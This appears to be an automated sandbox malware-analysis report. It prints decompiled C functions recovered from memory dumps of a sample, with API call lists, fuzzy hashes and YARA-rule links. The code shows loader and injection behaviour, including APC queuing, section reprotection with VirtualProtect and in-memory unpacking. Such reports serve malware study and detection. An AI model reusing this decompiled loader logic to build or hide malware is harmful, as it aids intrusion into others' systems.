					 *0x4030f0 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E004019A0(); // executed
					_t6 = _t4;
					HeapDestroy( *0x4030e0);
				}
				ExitProcess(_t6);
			}

0x00401d39
0x00401d42
0x00401d48
0x00401d4f
0x00401d58
0x00401d5d
0x00401d63
0x00401d6e
0x00401d70
0x00401d70
0x00401d77

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00401D42
GetModuleHandleA.KERNEL32(00000000), ref: 00401D52
GetCommandLineW.KERNEL32 ref: 00401D5D

Part of subcall function 004019A0: NtQuerySystemInformation.NTDLL ref: 004019DF
Part of subcall function 004019A0: Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A26
Part of subcall function 004019A0: GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00401A55
Part of subcall function 004019A0: GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00401A73
Part of subcall function 004019A0: CreateThread.KERNEL32 ref: 00401A9D
Part of subcall function 004019A0: QueueUserAPC.KERNEL32(004013C4,00000000,?,?,00000000), ref: 00401AB9

HeapDestroy.KERNEL32 ref: 00401D70
ExitProcess.KERNEL32 ref: 00401D77

Memory Dump Source

Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateHeapLongNamePath$CommandDestroyExitHandleInformationLineModuleProcessQueryQueueSleepSystemThreadUser
String ID:
API String ID: 2501132232-0
Opcode ID: 0d0ac4a0cb8a711b3e847264792f8c917a209596f5dc776f2b7e58a96ff77181
Instruction ID: 05a8c36faf6c528b4ee69dbfea55c2bb6b45a73a18d0234de67205c8428d1488
Opcode Fuzzy Hash: 0d0ac4a0cb8a711b3e847264792f8c917a209596f5dc776f2b7e58a96ff77181
Instruction Fuzzy Hash: B5E0B6709027209BC3212F71AF0DB4B3E68BF057927044536F606F22B4D7B84500CAAD

Uniqueness

Uniqueness Score: -1.00%

Function 022B5319, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E022B5319(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E022B155A(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x22bd2a8; // 0x24ba5a8
				_t4 = _t24 + 0x22bedc0; // 0x4779368
				_t5 = _t24 + 0x22bed68; // 0x4f0053
				_t26 = E022B5D79( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x22bd2a8; // 0x24ba5a8
						_t11 = _t32 + 0x22bedb4; // 0x477935c
						_t48 = _t11;
						_t12 = _t32 + 0x22bed68; // 0x4f0053
						_t52 = E022B272D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x22bd2a8; // 0x24ba5a8
							_t13 = _t35 + 0x22bedfe; // 0x30314549
							_t37 = E022B5B05(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x22bd25c - 6;
								if( *0x22bd25c <= 6) {
									_t42 =  *0x22bd2a8; // 0x24ba5a8
									_t15 = _t42 + 0x22bec0a; // 0x52384549
									E022B5B05(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x22bd2a8; // 0x24ba5a8
							_t17 = _t38 + 0x22bedf8; // 0x47793a0
							_t18 = _t38 + 0x22bedd0; // 0x680043
							_t45 = E022B4538(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x22bd238, 0, _t52);
						}
					}
					HeapFree( *0x22bd238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E022B4FF0(_t54);
				}
				return _t45;
			}

0x022b5319
0x022b5329
0x022b532c
0x022b5333
0x022b5335
0x022b5335
0x022b5338
0x022b533d
0x022b5344
0x022b5351
0x022b5356
0x022b535a
0x022b5368
0x022b5376
0x022b537a
0x022b540b
0x022b540b
0x022b5380
0x022b5380
0x022b5385
0x022b5385
0x022b538c
0x022b5398
0x022b539a
0x022b539c
0x022b539e
0x022b53a5
0x022b53b0
0x022b53b7
0x022b53b9
0x022b53c0
0x022b53c2
0x022b53c9
0x022b53d4
0x022b53d4
0x022b53c0
0x022b53d9
0x022b53de
0x022b53e5
0x022b5403
0x022b5405
0x022b5405
0x022b539c
0x022b5417
0x022b5417
0x022b5419
0x022b541e
0x022b5420
0x022b5420
0x022b542b

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04779368,00000000,?,74E5F710,00000000,74E5F730), ref: 022B5368
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,047793A0,?,00000000,30314549,00000014,004F0053,0477935C), ref: 022B5405
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,022B7CCB), ref: 022B5417

Strings

Ut, xrefs: 022B536E

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: 728aaccda8b527bf92703ef35125427e34f8412c39f94c6310cb5dfc51d4aba1
Instruction ID: 98d1f4b3650a387a3c838bb56fcd9b18638ac0500b65e1f2b7ddfcec65256de3
Opcode Fuzzy Hash: 728aaccda8b527bf92703ef35125427e34f8412c39f94c6310cb5dfc51d4aba1
Instruction Fuzzy Hash: 0E31AC72D10249BFDB13ABD0EC88EDABBBDEF44340F560166F501AB165D7B09A64CB50

Uniqueness

Uniqueness Score: -1.00%

Function 022B2C58, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E022B2C58(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				void* _t13;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x22bd340; // 0x4779c08
				_push(0x800);
				_push(0);
				_push( *0x22bd238);
				if( *0x22bd24c >= 5) {
					_t13 = RtlAllocateHeap(); // executed
					if(_t13 == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x22bd24c =  *0x22bd24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E022B2C0D(_t44, _t40);
						_t18 = E022B31A8(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x22bd24c < 5) {
								 *0x22bd24c =  *0x22bd24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E022B5433();
						HeapFree( *0x22bd238, 0, _t40);
						goto L10;
					}
					_t24 = E022B9BF1(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E022B5450(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}

0x022b2c58
0x022b2c58
0x022b2c5b
0x022b2c5c
0x022b2c66
0x022b2c6d
0x022b2c72
0x022b2c74
0x022b2c7a
0x022b2c9a
0x022b2ca2
0x022b2cba
0x022b2cbc
0x022b2cbd
0x022b2cbf
0x022b2cfd
0x022b2cfd
0x022b2d03
0x022b2d09
0x022b2d09
0x022b2cc1
0x022b2cc7
0x022b2cca
0x022b2cd9
0x022b2cdb
0x022b2ce2
0x022b2d16
0x022b2d1b
0x022b2d1d
0x022b2d1f
0x022b2d1f
0x00000000
0x022b2d1d
0x022b2ce4
0x022b2ce9
0x022b2cf7
0x00000000
0x022b2cf7
0x022b2cb1
0x022b2cb6
0x022b2cb6
0x00000000
0x022b2cb6
0x022b2c84
0x00000000
0x00000000
0x022b2c93
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 022B2C7C

Part of subcall function 022B5450: GetTickCount.KERNEL32 ref: 022B5464
Part of subcall function 022B5450: wsprintfA.USER32 ref: 022B54B4
Part of subcall function 022B5450: wsprintfA.USER32 ref: 022B54D1
Part of subcall function 022B5450: wsprintfA.USER32 ref: 022B54FD
Part of subcall function 022B5450: HeapFree.KERNEL32(00000000,?), ref: 022B550F
Part of subcall function 022B5450: wsprintfA.USER32 ref: 022B5530
Part of subcall function 022B5450: HeapFree.KERNEL32(00000000,?), ref: 022B5540
Part of subcall function 022B5450: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 022B556E
Part of subcall function 022B5450: GetTickCount.KERNEL32 ref: 022B557F

RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 022B2C9A
HeapFree.KERNEL32(00000000,00000002,022B7D16,?,022B7D16,00000002,?,?,022B312C,?), ref: 022B2CF7

Strings

Ut, xrefs: 022B2CF7

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID: Ut
API String ID: 1676223858-8415677
Opcode ID: ded4eb249a3008c351d335abcf14393a5f384769ac6ef59d4794b1162aeecbba
Instruction ID: 59aa7cbb96305dcafe29ad61dccf8a37b6b242ffbbe3480c0a62eeefdbf8be5b
Opcode Fuzzy Hash: ded4eb249a3008c351d335abcf14393a5f384769ac6ef59d4794b1162aeecbba
Instruction Fuzzy Hash: AB214A75660209EBC7039FD8EC48BDA37ACEF48395F014526FE019A255D7B0A9548F61

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00401BAE(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x403100;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x00401bb8
0x00401bc5
0x00401bcb
0x00401bd7
0x00401be7
0x00401be9
0x00401bf1
0x00401c86
0x00401c8d
0x00000000
0x00000000
0x00000000
0x00401bf7
0x00401bf7
0x00401bf7
0x00401bfb
0x00000000
0x00000000
0x00401c07
0x00401c0b
0x00401c2f
0x00401c33
0x00401c47
0x00401c47
0x00401c4d
0x00401c5c
0x00401c60
0x00401c68
0x00401c68
0x00401c70
0x00401c73
0x00401c80
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c80
0x00401c3b
0x00401c3f
0x00401c45
0x00000000
0x00000000
0x00000000
0x00401c45
0x00401c13
0x00401c17
0x00401c21
0x00401c19
0x00401c19
0x00401c19
0x00000000
0x00401c17
0x00000000

APIs

VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401BE7
VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00401C5C
GetLastError.KERNEL32 ref: 00401C62

Strings

`gt, xrefs: 00401BBD

Memory Dump Source

Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID: `gt
API String ID: 1469625949-3560540215
Opcode ID: e200ab23c86fef14a09755118c0811a6a082a578495e72e8b41036a9ef0c01c2
Instruction ID: b2c716a2ba88aaf16e81d6a071de259e4f48580833c7ea43561533825924546f
Opcode Fuzzy Hash: e200ab23c86fef14a09755118c0811a6a082a578495e72e8b41036a9ef0c01c2
Instruction Fuzzy Hash: EB215C7180420ADFDB18DF95C985ABAF7F4FB18345F01446AD602E7168E3B8EA64CB58

Uniqueness

Uniqueness Score: -1.00%

Function 022B8A19, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 022B8A76
SysAllocString.OLEAUT32(022B4BD8), ref: 022B8ABA
SysFreeString.OLEAUT32(00000000), ref: 022B8ACE
SysFreeString.OLEAUT32(00000000), ref: 022B8ADC

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: a596dd83ce3928f53bcf22750e12f90a1cc46600f3a01ac6ab160da1ad95f794
Instruction ID: a5d47629f041bd40d9d3e3fac564f9e498addf286394a3aa6e85f308c36820a9
Opcode Fuzzy Hash: a596dd83ce3928f53bcf22750e12f90a1cc46600f3a01ac6ab160da1ad95f794
Instruction Fuzzy Hash: C8311B72910249EFCB06DFD8D8C49EE7BB9FF48344B21882AF90A97250E7759941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004014AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004014AD(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x4030f0;
				_t46 = E00401B54(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x403100;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x4041a7; // 0x4041a7
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E00401B1C(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x403100 = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x004014b4
0x004014c4
0x004014c9
0x004014ce
0x004014e3
0x004014ea
0x004014ef
0x00401500
0x00401503
0x00401509
0x0040150e
0x004015c1
0x00401514
0x00401514
0x0040151a
0x00401589
0x0040151c
0x0040151c
0x0040151f
0x00401521
0x00401529
0x0040152c
0x0040152f
0x00401537
0x00401542
0x00401543
0x00401544
0x00401561
0x0040156f
0x00401576
0x00401579
0x0040157c
0x00401584
0x00000000
0x00000000
0x00401534
0x00401534
0x00401586
0x00401593
0x004015a8
0x00401595
0x0040159e
0x004015a3
0x004015b9
0x004015b9
0x004015c8
0x004015ce

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000000,00000000,?,00000000,?,?,?,?,?,?,00401A1F,00000000), ref: 00401503
memcpy.NTDLL(?,00401A1F,?,?,?,?,?,?,?,00401A1F,00000000,00000030,?,00000000), ref: 0040159E
VirtualFree.KERNELBASE(00401A1F,00000000,00008000,?,?,?,?,?,?,00401A1F,00000000), ref: 004015B9

Strings

Sep 21 2021, xrefs: 0040153A

Memory Dump Source

Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Sep 21 2021
API String ID: 4010158826-1195158264
Opcode ID: b7dea1d35fbcc01febc5ee39c7371c435db85bd8d238cfeac80864c67dbb79ad
Instruction ID: fec1488cb982f4c8a1e82a672e9de5c8239e5989683b6aa0ff19b00d826874a3
Opcode Fuzzy Hash: b7dea1d35fbcc01febc5ee39c7371c435db85bd8d238cfeac80864c67dbb79ad
Instruction Fuzzy Hash: 2C311071D00219EFDB01DF94DD85BEEB7B8BF48304F10416AE905BB291D775AA05CB98

Uniqueness

Uniqueness Score: -1.00%

Function 022B5B05, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E022B5B05(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E022B7B3B(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E022B2D2E(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E022BA38F(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x22bd238, 0, _t25);
				}
				return _t22;
			}

0x022b5b05
0x022b5b16
0x022b5b1a
0x022b5b75
0x022b5b1c
0x022b5b23
0x022b5b2b
0x022b5b2e
0x022b5b33
0x022b5b37
0x022b5b3d
0x022b5b45
0x022b5b48
0x022b5b60
0x022b5b60
0x022b5b6b
0x022b5b6b
0x022b5b7c

APIs

Part of subcall function 022B7B3B: lstrlen.KERNEL32(?,00000000,04779C18,00000000,022B5142,04779E3B,?,?,?,?,?,69B25F44,00000005,022BD00C), ref: 022B7B42
Part of subcall function 022B7B3B: mbstowcs.NTDLL ref: 022B7B6B
Part of subcall function 022B7B3B: memset.NTDLL ref: 022B7B7D

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,0477935C), ref: 022B5B3D
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,0477935C), ref: 022B5B6B

Strings

Ut, xrefs: 022B5B6B

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Ut
API String ID: 1500278894-8415677
Opcode ID: 42f7f98c4c1b7a18e3679389a9a17b43b8a7b00e68a78e1849cdabd1af2098c2
Instruction ID: 02a7417ea6e55e93871543ce08514b00c024bcfcf8d2e65145610b163f540ec6
Opcode Fuzzy Hash: 42f7f98c4c1b7a18e3679389a9a17b43b8a7b00e68a78e1849cdabd1af2098c2
Instruction Fuzzy Hash: 4301843262020ABBDB235FE4DC44FDB7B79EF84794F40442AFA409A168D7B1D965CB50

Uniqueness

Uniqueness Score: -1.00%

Function 022B4A2A, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E022B4A2A(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E022B1525(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x22bc284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x022b4a2e
0x022b4a3b
0x022b4a3d
0x022b4a3e
0x022b4a46
0x022b4a46
0x022b4a4a
0x00000000
0x00000000
0x022b4a41
0x022b4a42
0x022b4a45
0x022b4a45
0x022b4a52
0x022b4a57
0x022b4a5c
0x022b4a64
0x022b4a6a
0x022b4a6c
0x022b4a6f
0x022b4a73
0x022b4a75
0x022b4a78
0x022b4a78
0x022b4a79
0x022b4a7b
0x022b4a78
0x022b4a85
0x022b4a88
0x022b4a8b
0x022b4a8c
0x022b4a8e
0x022b4a95
0x022b4a95
0x022b4aa1

APIs

StrChrA.SHLWAPI(?,00000020,00000000,047795AC,022B30F3,?,022B1173,?,047795AC,?,022B30F3), ref: 022B4A46
StrTrimA.SHLWAPI(?,022BC284,00000002,?,022B1173,?,047795AC,?,022B30F3), ref: 022B4A64
StrChrA.SHLWAPI(?,00000020,?,022B1173,?,047795AC,?,022B30F3), ref: 022B4A6F

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: b72278887cc321003cd9814beb78d902f13e55109657851c554564561b5ab74e
Instruction ID: 883ea876f453abc3abe531e9589962ca7ec1fe5d34c630812fac4d6f5890470e
Opcode Fuzzy Hash: b72278887cc321003cd9814beb78d902f13e55109657851c554564561b5ab74e
Instruction Fuzzy Hash: 450192712203076FE7126AAA8CB8FA77B9DEF86784F444011A945CB246D674D801C764

Uniqueness

Uniqueness Score: -1.00%

Function 0041956F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

Qa, xrefs: 00419569

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID:
String ID: Qa
API String ID: 0-3901847582
Opcode ID: 1a5d0e7a21e9ded79f3144e41253d67be37013d1d8d597091abbc164341298d6
Instruction ID: b47e7f75465d59820186dd365715d03efea98188db4c6ed069c325c791d01869
Opcode Fuzzy Hash: 1a5d0e7a21e9ded79f3144e41253d67be37013d1d8d597091abbc164341298d6
Instruction Fuzzy Hash: C4011AB2500109EBDB16DF55D454BEB73B6AB48304F10845AFC06A7240D73DDE91CF99

Uniqueness

Uniqueness Score: -1.00%

Function 022B8B22, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E022B8B22(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x22bd238, 0, _a4); // executed
				return _t2;
			}

0x022b8b2e
0x022b8b34

APIs

RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E

Strings

Ut, xrefs: 022B8B2E

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: ea008cb4724469d2bd6a3a02824cb84c8fc83e63d43d9e13467aa632facfdab9
Instruction ID: 5db5d9d7867151c13b5d5f33990638dbe8ea954f1aff2aae9fa696fe9d12c84c
Opcode Fuzzy Hash: ea008cb4724469d2bd6a3a02824cb84c8fc83e63d43d9e13467aa632facfdab9
Instruction Fuzzy Hash: 16B01271D80100AFCA134BC0FE0CF05FA21AB50700F008C11B3040407083714470FB15

Uniqueness

Uniqueness Score: -1.00%

Function 022B76E7, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E022B76E7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E022B8A19(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x22bd2a8; // 0x24ba5a8
						_t20 = _t68 + 0x22be1fc; // 0x740053
